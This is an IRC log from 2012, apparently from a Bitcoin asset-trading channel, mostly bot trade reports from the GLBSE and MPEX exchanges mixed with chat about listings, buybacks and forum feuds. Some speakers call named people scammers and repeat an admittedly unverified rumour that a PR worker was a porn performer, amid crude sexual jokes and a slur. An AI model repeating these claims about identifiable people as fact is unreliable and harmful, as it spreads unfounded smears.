0.04300001 = 3.913 BTC [+] Sep 27 03:57:11 [GLBSE] [OBSI.HRPT] 9 @ 0.043 = 0.387 BTC [-] Sep 27 03:59:12 [MPEX] [S.MPOE] 15100 @ 0.00036025 = 5.4398 BTC [-] Sep 27 04:00:49 [GLBSE] [SS] 1 @ 0.01799999 BTC [+] Sep 27 04:02:05 [GLBSE] [HYDRO.BONDS] 1 @ 1.3959 BTC [-] Sep 27 04:04:23 [GLBSE] [SS] 5 @ 0.018 = 0.09 BTC [+] Sep 27 04:11:48 [GLBSE] [COGNITIVE] 1 @ 0.41949988 BTC [+] Sep 27 04:11:50 [GLBSE] [COGNITIVE] 12 @ 0.41949998 = 5.034 BTC [+] Sep 27 04:12:27 [GLBSE] [RAREEARTH] 10 @ 0.01 = 0.1 BTC [+] Sep 27 04:12:42 [GLBSE] [ASICMINER] 15 @ 0.11071 = 1.6607 BTC [+] Sep 27 04:12:52 what was the url on glbse to have it recalculate your account balance? Sep 27 04:14:11 https://glbse.com/portfolio/balance Sep 27 04:14:36 thanks Sep 27 04:15:59 [GLBSE] [ASICMINER] 1 @ 0.11071 BTC [+] Sep 27 04:24:12 [MPEX] [S.MPOE] 23470 @ 0.00036025 = 8.4551 BTC [-] Sep 27 04:24:14 [MPEX] [S.MPOE] 32004 @ 0.00035979 = 11.5147 BTC [-] Sep 27 04:32:17 [MPEX] [O.BTCUSD.P150T] 908 @ 0.2281784 = 207.186 BTC [+] Sep 27 04:32:20 [GLBSE] [ASICMINER] 10 @ 0.11 = 1.1 BTC [-] Sep 27 04:33:31 [MPEX] [O.BTCUSD.P170T] 2 @ 0.43968159 = 0.8794 BTC [-] Sep 27 04:33:33 [MPEX] [O.BTCUSD.P170T] 1 @ 0.43669084 BTC [-] Sep 27 04:33:34 [MPEX] [O.BTCUSD.P170T] 1 @ 0.42655291 BTC [-] Sep 27 04:33:35 [MPEX] [O.BTCUSD.P170T] 840 @ 0.39233552 = 329.5618 BTC [-] Sep 27 04:34:10 [GLBSE] [ASICMINER] 9 @ 0.11 = 0.99 BTC [-] Sep 27 04:38:40 [GLBSE] [GIGAMINING] 1 @ 0.5663 BTC [+] Sep 27 04:40:07 [GLBSE] [YABMC] 11 @ 0.07899999 = 0.869 BTC [+] Sep 27 04:42:45 [MPEX] [O.BTCUSD.C080T] 2 @ 0.34651564 = 0.693 BTC [+] Sep 27 04:42:46 [MPEX] [O.BTCUSD.C080T] 187 @ 0.34637153 = 64.7715 BTC [-] **** BEGIN LOGGING AT Thu Sep 27 11:35:29 2012 Sep 27 11:37:53 [MPEX] [F.GIGA.ETF] 1000 @ 0.00044037 = 0.4404 BTC [+] Sep 27 11:37:55 [MPEX] [F.GIGA.ETF] 372 @ 0.00044037 = 0.1638 BTC [+] Sep 27 11:37:55 [MPEX] [F.GIGA.ETF] 9728 @ 0.00044037 = 4.2839 BTC [+] Sep 27 11:37:56 [MPEX] [S.MPOE] 2100 @ 0.0003619 = 0.76 BTC [-] Sep 27 11:48:23 [GLBSE] [MOORE] 1 @ 0.501 BTC [+] Sep 27 11:49:09 [GLBSE] [YABMC] 2 @ 0.07894999 = 0.1579 BTC [+] Sep 27 12:03:26 [MPEX] [F.GIGA.ETF] 4900 @ 0.00044036 = 2.1578 BTC [-] Sep 27 12:03:27 [MPEX] [F.GIGA.ETF] 3600 @ 0.00044036 = 1.5853 BTC [-] Sep 27 12:17:51 Why doesn't assbot show crypto-stocks trades? Sep 27 12:19:43 i thought there weren't any ? Sep 27 12:20:39 [GLBSE] [OBSI.HRPT] 8 @ 0.04302005 = 0.3442 BTC [+] Sep 27 12:23:52 [GLBSE] [BFLS.RIG] 5 @ 0.58 = 2.9 BTC [+] Sep 27 12:28:49 [MPEX] [S.MPOE] 67100 @ 0.00036313 = 24.366 BTC [+] Sep 27 12:28:49 [MPEX] [S.MPOE] 100 @ 0.0003619 = 0.0362 BTC [-] Sep 27 12:32:07 [GLBSE] [YABIF] 3 @ 0.9 = 2.7 BTC [-] Sep 27 12:35:21 Luceo btw that wasn't meeant as a dig. i honestly thought so. are there any ? Sep 27 12:37:11 [GLBSE] [ASICMINER] 1 @ 0.10499999 BTC [+] Sep 27 12:37:12 [GLBSE] [ASICMINER] 35 @ 0.105 = 3.675 BTC [+] Sep 27 12:37:14 [GLBSE] [ASICMINER] 2 @ 0.10872 = 0.2174 BTC [+] Sep 27 12:37:15 [GLBSE] [ASICMINER] 100 @ 0.1098 = 10.98 BTC [+] Sep 27 12:37:15 [GLBSE] [ASICMINER] 50 @ 0.1099 = 5.495 BTC [+] Sep 27 12:37:17 [GLBSE] [ASICMINER] 1 @ 0.11071 BTC [+] Sep 27 12:37:18 [GLBSE] [ASICMINER] 15 @ 0.11071 = 1.6607 BTC [+] Sep 27 12:37:19 [GLBSE] [ASICMINER] 28 @ 0.111 = 3.108 BTC [+] Sep 27 12:37:20 [GLBSE] [ASICMINER] 10 @ 0.11499 = 1.1499 BTC [+] Sep 27 12:37:21 [GLBSE] [ASICMINER] 40 @ 0.115 = 4.6 BTC [+] Sep 27 12:37:22 [GLBSE] [ASICMINER] 50 @ 0.115 = 5.75 BTC [+] Sep 27 12:37:23 [GLBSE] [ASICMINER] 97 @ 0.115669 = 11.2199 BTC [+] Sep 27 12:37:24 [GLBSE] [ASICMINER] 400 @ 0.11567 = 46.268 BTC [+] Sep 27 12:37:25 [GLBSE] [ASICMINER] 30 @ 0.115689 = 3.4707 BTC [+] Sep 27 12:37:26 [GLBSE] [ASICMINER] 99 @ 0.1167 = 11.5533 BTC [+] Sep 27 12:37:27 [GLBSE] [ASICMINER] 20 @ 0.11679999 = 2.336 BTC [+] Sep 27 12:37:29 [GLBSE] [ASICMINER] 22 @ 0.1168 = 2.5696 BTC [+] Sep 27 12:37:30 mircea_popescu: There's a few Sep 27 12:37:45 I think cryptostocks will take glbse's place as a zero-fee exchange for the casuals Sep 27 12:37:52 that may be the case. Sep 27 12:37:59 im hoping they're a lot more... Sep 27 12:38:02 and mpex will retain its place as the serious exchange for volume traders Sep 27 12:38:03 actually. a lot saner. Sep 27 12:38:24 at this point there's no dispute there's a need for exactly that, a zero fee exchange for casuals Sep 27 12:38:41 I'm interested in cryptoexchange as a Litecoin exchange too, and possibly Microcash in the future Sep 27 12:38:44 place for people to try things out, learn etc. the only problem is that it should be run more like a university than like a three monte game Sep 27 12:38:49 [GLBSE] [BTCMC] 1 @ 0.51999999 BTC [+] Sep 27 12:38:51 [GLBSE] [BTCMC] 3 @ 0.52 = 1.56 BTC [+] Sep 27 12:38:55 [GLBSE] [BTCMC] 45 @ 0.52998 = 23.8491 BTC [+] Sep 27 12:39:06 three card monte* Sep 27 12:39:32 I think coinbr may help facilitate that anyway Sep 27 12:39:36 Fee free mpex trading :P Sep 27 12:39:51 possibly, yes. Sep 27 12:39:52 Well, signup-fee free Sep 27 12:39:58 But the trade fees are higher Sep 27 12:40:01 Makes sense for casual traders Sep 27 12:40:19 i guess the problem on forum and to some degree here is that all the bs/drama going on really drowns out all the constructive stuff made by sane people. Sep 27 12:40:32 idk, I don't even trade that much, I tend to invest long term Sep 27 12:40:34 jurov made possibly the product of the month, you've never heard of him in between goat, usagi & co Sep 27 12:40:49 Yeah, the drama gets pretty dumb Sep 27 12:41:01 well, actually I want to provide services to serious traders to make their life easier.. just wanted to show i'm serious Sep 27 12:41:16 tbh the biggest problem is people like gweedo, puppet, EB etc Sep 27 12:41:17 jurov incidentally, did yo umake a forum announcement yet ? Sep 27 12:41:26 Who don't run any businesses but still throw shit at other peoples' Sep 27 12:41:43 i don't want to deal with that crowd yet Sep 27 12:41:50 Luceo well some of them do actually contribute useful research Sep 27 12:41:58 jurov i can see your point. Sep 27 12:42:09 jurov: You should, they're itching for a GLBSE replacement Sep 27 12:42:42 jurov i'd have had the girl announce, but by now she has a following of losers that apparently have absolutely nothing to do with their lives. Sep 27 12:42:53 [GLBSE] [BTC-MINING] 5 @ 0.95979 = 4.799 BTC [+] Sep 27 12:42:54 [GLBSE] [BTC-MINING] 3 @ 0.95979 = 2.8794 BTC [+] Sep 27 12:42:56 [GLBSE] [BTC-MINING] 2 @ 0.95979 = 1.9196 BTC [+] Sep 27 12:42:57 [GLBSE] [BTC-MINING] 40 @ 0.95999999 = 38.4 BTC [+] Sep 27 12:43:37 if i did that right now, it could have ended up in flames :/ or i would be overwhelmed by deposits/withdraws that i do manually atm Sep 27 12:44:05 jurov take your time, you're too far advanced to blow up. Sep 27 12:44:59 [GLBSE] [BTC-MINING] 2 @ 0.95999999 = 1.92 BTC [+] Sep 27 12:45:49 my biggest worry is i could be never sure what to expect from mpex... as last time you solved order cancellation problems with "we're busy, try again later" Sep 27 12:45:57 mircea_popescu: If I had a bitcoin for every unfounded accusation I've had levelled at me on the forum by shrill idiots, I'd be able to buy a house with it Sep 27 12:46:34 jurov that's not a worry that should be allowed to stand. Sep 27 12:46:40 I'm sure the girl you employ could say the same :P Sep 27 12:46:42 what'd you need ? Sep 27 12:46:53 Luceo i'm sure she'd make more from that than she makes from me. Sep 27 12:47:22 and, i'm repeating it for x-th time, the btc balance could change for any reason and i have to pair expected deposits/option exercises against the balance Sep 27 12:47:50 thanks got i don't have to worry bout interest atm Sep 27 12:48:06 these two'd seem to be different issues tho, neh ? Sep 27 12:48:46 ok, in practical terms, how about this : if any substantial change that might effect you, i put a ban on your ip so you can't connect. it'll be lifted just as soon as the issue is resolved ofcourse Sep 27 12:49:01 this way at least you have the guarantee you can't wake up one morning and whoops, shit happened impredictably Sep 27 12:49:07 would that be something you'd want ? Sep 27 12:50:28 not at all Sep 27 12:50:33 a ok Sep 27 12:51:02 well, i'm open to ideeas to narrow/mitigate your worry. Sep 27 12:52:02 look. try to create yourself a basic desktop app that could accurately bookkeep user's account, orders,transactions, based on today's stat interface Sep 27 12:52:13 and listen to swearing of the programmer Sep 27 12:52:40 my biggest worry is i could be never sure what to expect from mpex... << i was trying to answer to that Sep 27 12:54:18 [MPEX] [F.GIGA.ETF] 1206 @ 0.00044037 = 0.5311 BTC [+] Sep 27 12:54:20 i admit, this one is more a gut feeling than something concrete Sep 27 12:54:39 well if it ever becomes more concrete then that we can talk about it more. Sep 27 12:58:24 guruvan you happen to be right in the ciuciu-bond ponzi thing. https://bitcointalk.org/index.php?topic=95826.msg1092063#msg1092063 guy's pretty much been slinging mud ever since. i guess he knows he's a scammer. Sep 27 12:59:59 strange Sep 27 13:00:37 eh, someone please come here and kick me unconcsious so that i learn not to air my insecurity publicly Sep 27 13:04:51 in nefarios conference address, when he posited a marijuana future appreciating in a 'big baggie' there was applause, the only audible response to his presentation Sep 27 13:05:47 apparently this is the future of bitcoin Sep 27 13:06:14 dub nope. Sep 27 13:06:25 bitcoin will in the next 5-10 eyars become the currency of black pools. Sep 27 13:06:32 the mid term future of bitcoin is purely financial. Sep 27 13:06:34 according to these scumbags Sep 27 13:06:40 a well, who're they. Sep 27 13:06:45 THE FUTURE IS NOW HURR HURR Sep 27 13:07:36 jurov lol what happened ? Sep 27 13:10:14 mircea_popescu: Is there a fee to create an asset on MPEX? Sep 27 13:10:18 yes. Sep 27 13:10:33 I wonder if I should sell DMC shares on multiple exchanges Sep 27 13:10:38 that'd be an interesting experiment Sep 27 13:10:43 How much is it? Sep 27 13:11:06 Luceo the way mpex works is that a contract between issuer and mpex is negotiated, which becomes the basis of listing Sep 27 13:11:21 mircea_popescu: yeah, but whats the pallpark figure Sep 27 13:11:24 (mpex assets stem from this contract, they're not contracts between issuer and shareholder) Sep 27 13:11:30 [GLBSE] [ASICMINER] 2 @ 0.11675 = 0.2335 BTC [-] Sep 27 13:11:34 part of that contract is an ancillary agreement on fees, which is not public Sep 27 13:11:40 and is negotiated on a case-by-case basis Sep 27 13:12:01 many points are involved, including subsequent market-making for the security etc, so it's not a simple scalar value. Sep 27 13:12:31 Makes sense, might come to you in the not too distant future with an asset proposition Sep 27 13:12:36 I know I'm done with glbse Sep 27 13:12:55 well, bear in mind that while size per se is not a criteria, solidity of business is very much so. Sep 27 13:13:22 there's corps listed ranging from ~3k to close half a mil btc total market cap, but all of them actually have a business plan. Sep 27 13:14:19 mircea, it would hurt me if i went around showing how nervous i am... Sep 27 13:14:28 jurov lol relax then! Sep 27 13:14:37 Here it may pass, but not on bitcontalk Sep 27 13:14:38 take a hot bath with a couple nude students ? Sep 27 13:15:03 [GLBSE] [PUREMINING] 9 @ 0.10335 = 0.9302 BTC [-] Sep 27 13:15:04 [GLBSE] [PUREMINING] 3 @ 0.10335 = 0.3101 BTC [-] Sep 27 13:15:05 [GLBSE] [PUREMINING] 15 @ 0.10335 = 1.5503 BTC [-] Sep 27 13:15:45 Mircea,you can provide one? Sep 27 13:15:46 hmm, anyone knows markm's handle on irc ? the guy with open transactions. i know i used to talk to him Sep 27 13:16:02 jurov haha i ain't sharing gtfo Sep 27 13:16:16 Oh and i prefer male students anyway. Sep 27 13:16:22 [GLBSE] [PUREMINING] 4 @ 0.1034 = 0.4136 BTC [+] Sep 27 13:16:23 [GLBSE] [PUREMINING] 43 @ 0.1034 = 4.4462 BTC [+] Sep 27 13:16:31 jurov is a gay teacher? Sep 27 13:16:55 maybe he's a girl ?! Sep 27 13:17:19 Yes, i'm a fag. BUT DON'T DARE ME CALL A TEACHER! Sep 27 13:17:27 oh, fellow student then? Sep 27 13:17:38 kinda Sep 27 13:18:12 student of life :) Sep 27 13:18:17 o hey, i didn't know there were gay people on the internet. Sep 27 13:18:25 mircea_popescu: ARE YOU FUCKING KIDDING? Sep 27 13:18:28 half the internet is gay! Sep 27 13:18:29 Diablo-D3 yes. Sep 27 13:18:31 and/or a furry! Sep 27 13:19:08 PURGE THE UNCLEAN! Sep 27 13:19:39 mmm Sep 27 13:19:42 [MPEX] [S.MPOE] 10125 @ 0.00036412 = 3.6867 BTC [+] Sep 27 13:19:44 [MPEX] [S.MPOE] 39875 @ 0.00036413 = 14.5197 BTC [+] Sep 27 13:20:37 EXORCISE|S.MPOE|1000000 Sep 27 13:20:48 oops wrong window Sep 27 13:20:54 so mpoe. Sep 27 13:21:12 [GLBSE] [PUREMINING] 9 @ 0.1035 = 0.9315 BTC [+] Sep 27 13:21:27 exorcise ? lmao Sep 27 13:21:58 one pea soup coming up, HURRRARGH Sep 27 13:26:20 [GLBSE] [PUREMINING] 114 @ 0.1036 = 11.8104 BTC [+] Sep 27 13:33:23 [MPEX] [O.BTCUSD.C100T] 3 @ 0.1863325 = 0.559 BTC [+] Sep 27 13:33:24 [MPEX] [O.BTCUSD.C100T] 923 @ 0.18422449 = 170.0392 BTC [-] Sep 27 13:35:06 [GLBSE] [GSDPT] 2 @ 0.003399 = 0.0068 BTC [+] Sep 27 13:36:02 [GLBSE] [DMC] 39 @ 0.12 = 4.68 BTC [+] Sep 27 13:40:22 [GLBSE] [PUREMINING] 1 @ 0.1036 BTC [+] Sep 27 13:40:22 [GLBSE] [PUREMINING] 38 @ 0.1037 = 3.9406 BTC [+] Sep 27 13:57:19 [GLBSE] [ASICMINER] 13 @ 0.115 = 1.495 BTC [-] Sep 27 13:58:35 [MPEX] [F.GIGA.ETF] 3800 @ 0.00044036 = 1.6734 BTC [-] Sep 27 14:06:55 [GLBSE] [DMC] 5 @ 0.100001 = 0.5 BTC [-] Sep 27 14:06:57 [GLBSE] [DMC] 864 @ 0.1 = 86.4 BTC [-] Sep 27 14:06:58 [GLBSE] [DMC] 31 @ 0.1 = 3.1 BTC [-] Sep 27 14:08:41 "Eariler today, Nyancat Financial and bitcoin community socialite usagi commented" Sep 27 14:08:44 0.0 Sep 27 14:09:19 [GLBSE] [DMC] 469 @ 0.1 = 46.9 BTC [-] Sep 27 14:11:16 mircea_popescu: yeah, apparently hes a "socialite" Sep 27 14:11:19 whatever that is Sep 27 14:11:57 i thought it meant cocksucker. Sep 27 14:12:21 as in, the socialite is the party girl that sucks your cock. Sep 27 14:12:45 [GLBSE] [DMC] 1 @ 0.096 BTC [-] Sep 27 14:12:46 [GLBSE] [DMC] 113 @ 0.06 = 6.78 BTC [-] Sep 27 14:13:00 mircea_popescu: no Sep 27 14:13:15 mircea_popescu: it means mitt romney. Sep 27 14:16:06 and now the floor got broken through Sep 27 14:17:23 11909 shares out. Sep 27 14:22:59 [GLBSE] [DMC] 387 @ 0.06 = 23.22 BTC [-] Sep 27 14:23:00 [GLBSE] [DMC] 113 @ 0.055 = 6.215 BTC [-] Sep 27 14:23:51 [MPEX] [S.MPOE] 23725 @ 0.00036413 = 8.639 BTC [+] Sep 27 14:23:53 [MPEX] [S.MPOE] 2575 @ 0.00036419 = 0.9378 BTC [+] Sep 27 14:30:17 [GLBSE] [DI.BFLSC.FAIL] 1 @ 0.000999 BTC [-] Sep 27 14:31:35 [MPEX] [O.BTCUSD.P040T] 22 @ 0.02999761 = 0.6599 BTC [+] Sep 27 14:32:09 [MPEX] [O.BTCUSD.P040T] 10 @ 0.02351635 = 0.2352 BTC [-] Sep 27 14:34:32 [MPEX] [O.BTCUSD.P010N] 20 @ 0.02943504 = 0.5887 BTC [+] Sep 27 14:36:45 [MPEX] [O.BTCUSD.P010N] 31 @ 0.02540061 = 0.7874 BTC [-] Sep 27 14:45:29 https://bitcointalk.org/index.php?topic=113409.0 Sep 27 14:45:40 if anyone wants to be a darling and plaster that in -otc Sep 27 14:50:54 dunno if that would help anyone Sep 27 14:52:03 maybe if mpoe-pr led by example and said something like "okay i was spammer and pron star, but learned what is important in life and now i'm serious" Sep 27 14:52:53 (maybe she wasn't, sorry, i don't know) Sep 27 14:54:09 besides, neither of you have english blog and google translate on trilema is incomprehensible Sep 27 14:54:40 i fail to follow the logic of that tho jurov Sep 27 14:55:06 just my opinion what couls have bigger psychological impact Sep 27 14:55:09 *could Sep 27 14:55:21 weird. Sep 27 14:55:35 so i should turn mpex into a blog and the pr chick should go into porn ? or wtf. Sep 27 14:56:36 there is some apparent evidence she *was* in porn Sep 27 14:57:05 i've never seen any such evidence, moreover... why's that relevant ? Sep 27 14:58:51 so that mpoe-pr seems to advise everyone what to do.. and many ppl reply "yeah the scammer pr0n star tells us what to do" Sep 27 14:59:01 that'll be exactly their problem. Sep 27 14:59:09 perhaps. Sep 27 14:59:21 hey, she was telling people not to go into pirate in april. Sep 27 14:59:35 it's a free world, except... things have consequences. Sep 27 15:00:46 and the thing about blog, you can have at least some interesting tidbits in trilema in english... it's part of pr too, no? Sep 27 15:01:02 especially if she advises to do it Sep 27 15:01:54 [MPEX] [S.MPOE] 40519 @ 0.00036419 = 14.7566 BTC [+] Sep 27 15:01:55 [MPEX] [S.MPOE] 6905 @ 0.0003643 = 2.5155 BTC [+] Sep 27 15:01:57 [MPEX] [S.MPOE] 12876 @ 0.00036439 = 4.6919 BTC [+] Sep 27 15:02:05 jurov you mean like http://trilema.com/2012/security-comparison-of-bitcoin-denominated-instruments-exchanges/ ? Sep 27 15:03:09 yeah, go to frontpage http://trilema.com/ and try to dig this one out... Sep 27 15:03:33 well trilema publishes tons of content, 100s of articles am onth. but this was linked at the time and discussed here too Sep 27 15:05:58 well, i'll say it another way. i don't always follow on irc, i want to go to trilema and see what you have to say about mpex, glbse, etc. Sep 27 15:06:21 yeah, i see what you mean, i've been considering the matter. Sep 27 15:06:24 i'm looking in the rubrics, it just isn't there. i'm lsot. Sep 27 15:06:30 *lost Sep 27 15:06:31 so far it's either irc or mpoe=pr on the forum. Sep 27 15:10:58 mircea_popescu is a pornographer Sep 27 15:11:09 ur mom Sep 27 15:13:27 [GLBSE] [CBGB] 4 @ 0.4989 = 1.9956 BTC [-] Sep 27 15:13:28 [GLBSE] [CBGB] 2 @ 0.499 = 0.998 BTC [+] Sep 27 15:13:29 [GLBSE] [CBGB] 74 @ 0.5 = 37 BTC [+] Sep 27 15:14:48 and also, i haven't seen any reaction to the fluffygrrl thing Sep 27 15:16:01 i decided for it to not bother me, but it would help if you can say some definite word about it Sep 27 15:18:08 what would i say ? Sep 27 15:19:13 [13:52] maybe if mpoe-pr led by example and said something like "okay i was spammer and pron star, but learned what is important in life and now i'm serious" Sep 27 15:19:38 but maybe i'm naive and it's better to not say anything Sep 27 15:19:40 i'm not aware either of these be true, as i said. Sep 27 15:20:00 in general there's going to be people on the forum saying anything about anyone, so... Sep 27 15:21:39 yes Sep 27 15:27:01 [MPEX] [F.GIGA.ETF] 1900 @ 0.00044037 = 0.8367 BTC [+] Sep 27 15:27:02 [MPEX] [F.GIGA.ETF] 214 @ 0.00044037 = 0.0942 BTC [+] Sep 27 15:27:04 [MPEX] [F.GIGA.ETF] 2600 @ 0.00044037 = 1.145 BTC [+] Sep 27 15:27:05 [MPEX] [F.GIGA.ETF] 5686 @ 0.00044037 = 2.5039 BTC [+] Sep 27 15:31:37 ;;seen nefario Sep 27 15:31:37 nefario was last seen in #bitcoin-assets 2 days, 16 hours, 31 minutes, and 43 seconds ago: Those assets are not listed or traded anymore Sep 27 15:35:40 Any updates on any of the gossip? Sep 27 15:35:46 pirate,sec,bfls etc etc xD Sep 27 15:40:28 [GLBSE] [OBSI.HRPT] 2 @ 0.05 = 0.1 BTC [+] Sep 27 15:40:29 [GLBSE] [OBSI.HRPT] 3 @ 0.05 = 0.15 BTC [+] Sep 27 15:42:46 [GLBSE] [BAKEWELL] 7 @ 0.1499999 = 1.05 BTC [-] Sep 27 15:42:48 [GLBSE] [BAKEWELL] 3 @ 0.15 = 0.45 BTC [+] Sep 27 15:50:17 le fuck Sep 27 15:50:25 my tc cointaner got corrupted Sep 27 15:50:31 FTW Sep 27 15:52:06 [MPEX] [S.MPOE] 44073 @ 0.0003619 = 15.95 BTC [-] Sep 27 15:53:51 kakobrekla tc ? Sep 27 15:54:23 truecrypt Sep 27 15:54:42 ew Sep 27 15:54:51 i accualy puked a little cause i couldnt find the restore cd imidiatley Sep 27 15:55:03 but i finally did at around 6 or 7 in the morning Sep 27 15:55:11 hehe Sep 27 15:55:29 [GLBSE] [ASICMINER] 1 @ 0.10400001 BTC [-] Sep 27 15:55:31 [GLBSE] [ASICMINER] 2 @ 0.104 = 0.208 BTC [-] Sep 27 15:55:32 [GLBSE] [ASICMINER] 2 @ 0.103223 = 0.2064 BTC [-] Sep 27 15:55:33 [GLBSE] [ASICMINER] 32 @ 0.102201 = 3.2704 BTC [-] Sep 27 15:55:35 [GLBSE] [ASICMINER] 2 @ 0.1021 = 0.2042 BTC [-] Sep 27 15:55:36 [GLBSE] [ASICMINER] 60 @ 0.102 = 6.12 BTC [-] Sep 27 15:55:37 [GLBSE] [ASICMINER] 1 @ 0.1011 BTC [-] Sep 27 15:55:37 [GLBSE] [ASICMINER] 1 @ 0.101 BTC [-] Sep 27 15:55:38 [GLBSE] [ASICMINER] 12 @ 0.10066798 = 1.208 BTC [-] Sep 27 15:55:39 [GLBSE] [ASICMINER] 37 @ 0.10000001 = 3.7 BTC [-] Sep 27 15:55:55 http://www.guardian.co.uk/world/2012/sep/26/3d-printing-guns-legal-issues-us-law Sep 27 15:56:27 been runing a fix for 3horus now Sep 27 15:56:30 50% done Sep 27 15:56:34 argh. Sep 27 16:09:42 [GLBSE] [MERGEDMINING] 5 @ 0.06494 = 0.3247 BTC [-] Sep 27 16:13:38 < copumpkin> fair enough :) I'm gonna get back to boring reading about accounting Sep 27 16:13:41 < copumpkin> O smickles how I do not envy thee Sep 27 16:13:49 really? accounting is fun! Sep 27 16:13:53 :P Sep 27 16:15:08 the difference between you is that one is married. Sep 27 16:15:13 that explains everything. Sep 27 16:15:57 well, that and accounting is bred into me Sep 27 16:17:27 [MPEX] [S.MPOE] 4611 @ 0.00036439 = 1.6802 BTC [+] Sep 27 16:17:28 [MPEX] [S.MPOE] 6100 @ 0.0003647 = 2.2247 BTC [+] Sep 27 16:17:29 [MPEX] [S.MPOE] 44048 @ 0.00036475 = 16.0665 BTC [+] Sep 27 16:20:26 [MPEX] [O.BTCUSD.P100N] 2 @ 0.11591307 = 0.2318 BTC [-] Sep 27 16:23:09 [GLBSE] [BFLS.RIG] 5 @ 0.54 = 2.7 BTC [-] Sep 27 16:25:31 hmm Sep 27 16:25:38 re-estimated 11 hrs remaining Sep 27 16:25:41 ew Sep 27 16:25:47 i guess im having a computer free day Sep 27 16:31:35 ;;gettrust freewill Sep 27 16:31:36 Trust relationship from user mircea_popescu to user freewill: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=freewill Sep 27 16:31:55 ;;ident freewill Sep 27 16:31:55 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Sep 27 16:36:20 !ticker dmc Sep 27 16:36:27 [GLBSE:DMC] [Bid: 0.055] [Ask: 0.1] [Spread: 0.045] [Last: 0.055] [24hVol: 856.32990476] [7dAvg: 0.06621312] Sep 27 16:36:55 856 ?! wtf. Sep 27 16:37:00 the entire float changed hands today ? Sep 27 16:37:19 vol is in btc' Sep 27 16:37:51 yes. and the share traded 0.03-0.05ish forever Sep 27 16:37:59 and the float is like 10-20k Sep 27 16:39:55 mircea_popescu: I bought back almost 10k shares Sep 27 16:40:07 today ? Sep 27 16:41:00 yes Sep 27 16:41:18 your own money or loan ? planning to delist ? (obviously you don't have to answer) Sep 27 16:42:15 mircea_popescu: no, abmo liquidated Sep 27 16:42:22 so I just used the cash to buy out all the trolls Sep 27 16:42:39 o, so dmc bought its own shares, that's what you mean by "i" Sep 27 16:44:43 yes Sep 27 16:44:50 not me personally, me with my CEO hat on Sep 27 16:45:20 well im curious what next chapter is Sep 27 16:46:01 [MPEX] [F.GIGA.ETF] 802 @ 0.00044037 = 0.3532 BTC [+] Sep 27 16:46:03 [MPEX] [F.GIGA.ETF] 8000 @ 0.00044037 = 3.523 BTC [+] Sep 27 16:46:04 [MPEX] [F.GIGA.ETF] 398 @ 0.00044037 = 0.1753 BTC [+] Sep 27 16:46:06 well, I really wish asicminer would get their chips already Sep 27 16:46:31 you and some others Sep 27 16:47:04 I want to bring shares out down to 10k, and I think DMC can start growing properly again Sep 27 16:50:38 [GLBSE] [OBSI.HRPT] 7 @ 0.04302005 = 0.3011 BTC [-] Sep 27 16:51:44 luls pirate stock exchange Sep 27 16:51:50 http://www.reuters.com/article/2009/12/01/us-somalia-piracy-investors-idUSTRE5B01Z920091201 Sep 27 16:52:26 its time to introduce them to the bitcoin Sep 27 16:52:32 ahaha Sep 27 16:53:58 [GLBSE] [GSDPT] 13 @ 0.003399 = 0.0442 BTC [+] Sep 27 16:56:30 [GLBSE] [NYAN.B] 10 @ 0.9699 = 9.699 BTC [+] Sep 27 16:56:32 [GLBSE] [NYAN.B] 10 @ 0.97 = 9.7 BTC [+] Sep 27 16:56:33 [GLBSE] [NYAN.B] 55 @ 0.9799 = 53.8945 BTC [+] Sep 27 16:59:32 [GLBSE] [ASICMINER] 1 @ 0.11325578 BTC [+] Sep 27 16:59:33 [GLBSE] [ASICMINER] 2 @ 0.11325579 = 0.2265 BTC [+] Sep 27 16:59:35 [GLBSE] [ASICMINER] 97 @ 0.1144998 = 11.1065 BTC [+] Sep 27 17:02:31 [GLBSE] [NYAN.B] 45 @ 0.9799 = 44.0955 BTC [+] Sep 27 17:02:32 [GLBSE] [NYAN.B] 50 @ 0.98 = 49 BTC [+] Sep 27 17:02:33 [GLBSE] [NYAN.B] 1 @ 0.9878 BTC [+] Sep 27 17:02:34 [GLBSE] [NYAN.B] 4 @ 0.988 = 3.952 BTC [+] Sep 27 17:04:04 [GLBSE] [GSDPT] 385 @ 0.003399 = 1.3086 BTC [+] Sep 27 17:04:05 [GLBSE] [GSDPT] 2 @ 0.00339999 = 0.0068 BTC [+] Sep 27 17:04:07 [GLBSE] [GSDPT] 1333 @ 0.0034 = 4.5322 BTC [+] Sep 27 17:04:41 [MPEX] [O.BTCUSD.C120T] 594 @ 0.03183313 = 18.9089 BTC [-] Sep 27 17:04:43 [GLBSE] [NYAN.B] 1 @ 0.9884 BTC [+] Sep 27 17:04:44 [GLBSE] [NYAN.B] 1 @ 0.9885 BTC [+] Sep 27 17:04:46 [GLBSE] [NYAN.B] 12 @ 0.99 = 11.88 BTC [+] Sep 27 17:04:47 [GLBSE] [NYAN.B] 26 @ 0.997 = 25.922 BTC [+] Sep 27 17:05:20 [MPEX] [O.BTCUSD.P140T] 2 @ 0.1526753 = 0.3054 BTC [-] Sep 27 17:05:22 [MPEX] [O.BTCUSD.P140T] 564 @ 0.14235074 = 80.2858 BTC [-] Sep 27 17:05:50 [MPEX] [O.BTCUSD.P130T] 519 @ 0.06053997 = 31.4202 BTC [-] Sep 27 17:06:01 [MPEX] [O.BTCUSD.P120T] 479 @ 0.01486739 = 7.1215 BTC [-] Sep 27 17:11:26 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 27 17:12:55 [MPEX] [O.BTCUSD.P200T] 408 @ 0.63321534 = 258.3519 BTC [-] Sep 27 17:13:33 [MPEX] [S.MPOE] 60900 @ 0.00036407 = 22.1719 BTC [-] Sep 27 17:13:34 [MPEX] [S.MPOE] 13598 @ 0.0003619 = 4.9211 BTC [-] Sep 27 17:13:36 [MPEX] [S.MPOE] 65500 @ 0.00036091 = 23.6396 BTC [-] Sep 27 17:13:37 [MPEX] [S.MPOE] 4800 @ 0.00036075 = 1.7316 BTC [-] Sep 27 17:13:38 [MPEX] [S.MPOE] 14600 @ 0.00036054 = 5.2639 BTC [-] Sep 27 17:13:39 [MPEX] [S.MPOE] 50516 @ 0.00036041 = 18.2065 BTC [-] Sep 27 17:13:40 [MPEX] [S.MPOE] 311 @ 0.0003603 = 0.1121 BTC [-] Sep 27 17:13:41 [MPEX] [S.MPOE] 14565 @ 0.00035987 = 5.2415 BTC [-] Sep 27 17:15:31 [MPEX] [S.MPOE] 50335 @ 0.00035987 